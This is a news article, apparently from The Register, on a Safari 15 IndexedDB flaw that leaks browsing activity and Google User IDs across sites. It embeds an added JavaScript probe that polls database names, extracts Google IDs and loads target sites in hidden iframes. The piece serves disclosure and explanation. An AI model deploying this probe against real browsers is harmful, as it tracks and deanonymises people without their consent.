A flaw in Safari 15's implementation of IndexedDB, the browser API that websites use to store data on the client side, leaks a user's recent browsing activity and can even expose their identity.
The bug was found by the fraud-detection outfit Fingerprint JS, which reported it to the WebKit maintainers along with a public source-code repository demonstrating the issue.
That report went in on November 28 last year. With no fix forthcoming, the Fingerprint JS team decided to publish its findings to hurry a repair along.
IndexedDB, like other browser storage, is supposed to obey the same-origin policy: a database created by one website should be invisible to pages from any other site. In this particular case, however, the separation breaks down. In Safari 15, every time a site interacts with a database, a new empty database with the same name is created in every other active frame, tab and window in the same browser session. Other websites can therefore see the names of those databases, and names alone can be revealing: the Safari bug can, for example, disclose information tied to a user's Google account.
Some Google services name a database after the logged-in user's unique Google User ID, so that identifier ends up in the list of database names. A malicious site that scrapes the ID from those names can then look it up, for instance against public profile data, to recover personal details about the person behind it.
Nor is that all. A malicious website can tie together several accounts belonging to the same user, if more than one is signed in, and the victim need do nothing beyond leaving a window open in the background. The malicious page can also trigger the leak itself by loading other websites in an iframe or popup, opening a Pandora's box of leaky data.
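To make the mechanism above concrete, here is an added example (not code from The Register, from Fingerprint JS or from the WebKit project) of how a page could observe the leak: snapshot the database names visible to its own origin, poll `indexedDB.databases()` for names that appear afterwards, and map those names to sites and Google User IDs. The fingerprint table, the 21-digit shape assumed for a Google User ID and the helper names (`watchForLeak`, `loadInHiddenFrame`) are assumptions made for the example; the browser-only calls are injected as functions so the logic can also run under Node with constructed input.

```javascript
// Added example, not code from The Register or from Fingerprint JS: a sketch of
// how a page could observe the Safari 15 IndexedDB name leak described above.
// The browser-only calls are injected as functions so the logic runs under Node
// with constructed input.

// Hypothetical fingerprint table mapping a database name to the site assumed to
// create it. These names are constructed for the example; a real probe would be
// built from names observed on the sites it targets.
const KNOWN_DATABASES = {
  "example-shop-cart": "shop.example",
  "example-video-prefs": "video.example",
};

// Google services name a database after the signed-in Google User ID. The ID is
// assumed here to be a long all-digit string; 21 digits is an assumption made
// for this example, not a fact from the article.
const GOOGLE_USER_ID = /^\d{21}$/;

// Map leaked database names to visited sites and Google User IDs.
function classifyDatabaseNames(names, known = KNOWN_DATABASES) {
  const sites = new Set();
  const googleUserIds = new Set();
  for (const name of names) {
    if (GOOGLE_USER_ID.test(name)) {
      googleUserIds.add(name);
    } else if (Object.prototype.hasOwnProperty.call(known, name)) {
      sites.add(known[name]);
    }
  }
  return { sites: [...sites].sort(), googleUserIds: [...googleUserIds].sort() };
}

// Names present now that were not in the baseline snapshot. On a correctly
// isolated browser this only ever contains databases this origin created itself;
// on Safari 15 it also picks up the empty copies mirrored from other origins.
function newDatabaseNames(baseline, current) {
  const seen = new Set(baseline);
  return current.filter((name) => !seen.has(name));
}

// In a browser, listDatabases would be:
//   () => indexedDB.databases().then((dbs) => dbs.map((db) => db.name))
// rounds and sleep are parameters so the logic can be exercised without delays.
async function watchForLeak({ listDatabases, rounds = 4, intervalMs = 250, sleep = defaultSleep }) {
  const baseline = await listDatabases();
  const leaked = new Set();
  for (let i = 0; i < rounds; i++) {
    await sleep(intervalMs);
    for (const name of newDatabaseNames(baseline, await listDatabases())) leaked.add(name);
  }
  return classifyDatabaseNames([...leaked]);
}

function defaultSleep(ms) {
  return new Promise((resolve) => setTimeout(resolve, ms));
}

// Browser-only trigger: load another site in a hidden iframe so that any
// IndexedDB activity it performs happens inside this browser session. Returns
// null outside a browser (for example under Node).
function loadInHiddenFrame(url, doc = globalThis.document) {
  if (!doc) return null;
  const frame = doc.createElement("iframe");
  frame.style.display = "none";
  frame.src = url;
  doc.body.appendChild(frame);
  return frame;
}

if (typeof indexedDB !== "undefined") {
  // Running in a browser: probe for about a second and log what leaked.
  watchForLeak({
    listDatabases: () => indexedDB.databases().then((dbs) => dbs.map((db) => db.name)),
  }).then((result) => console.log("leaked:", result));
}
```

The `sites` half of the result is the browsing-history leak and the `googleUserIds` half is the identity leak. Two caveats: the iframe trigger only works against sites that allow themselves to be framed (a `frame-ancestors` or `X-Frame-Options` header blocks it, which is why a popup is the alternative route), and the only thing a site operator can do on their side is to stop putting user identifiers in database names; the actual isolation failure has to be fixed in WebKit.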
Fingerprint JS has published a video explaining the process.
The team found that more than 30 of the Alexa Top 1000 websites interact with indexed databases on their home pages without any user interaction, and it reckons there are plenty more beyond that.
Unfortunately, Private Browsing mode does not solve the problem either, although because Safari keeps each private tab as a separate session, only sites visited in the same tab are exposed, which narrows the scope of what the leak reveals.
The fraud-detection firm also built a demo that identifies which of the affected sites a visitor has opened, or recently opened, and whether they are signed in to a Google account. It checks for more than 20 popular sites known to trigger the leak, and it works in Safari 15 on macOS and in any browser on iOS 15 or iPadOS 15, because Apple requires every browser on those platforms to use WebKit.
It's all a bit ironic considering that in June 2020, Apple refused to implement 16 web APIs in Safari's WebKit engine, claiming they posed a privacy threat. Some researchers hailed the move as a victory for privacy, but many mocked the decision, saying the action was taken to force the use of native iOS apps and the income they bring in.
Of course, this kind of use-our-product-only approach goes beyond browsers for the company. Last week, Apple was forced to stop dragging its feet and allow third-party app billing systems in Korea under the country's Telecommunications Business Act. Google was ordered to do the same in September and complied in November, over two months before Apple.
Forcing everyone onto WebKit, and thus its IndexedDB implementation, has caused trouble before. A bug in Safari 14.1.1 on macOS 11.4 and iOS 14.6, triggered when applications first tried to use the IndexedDB NoSQL-style object store to save data, provoked user outrage in June last year, with one open-source developer describing Apple as "directly hostile to the web." ®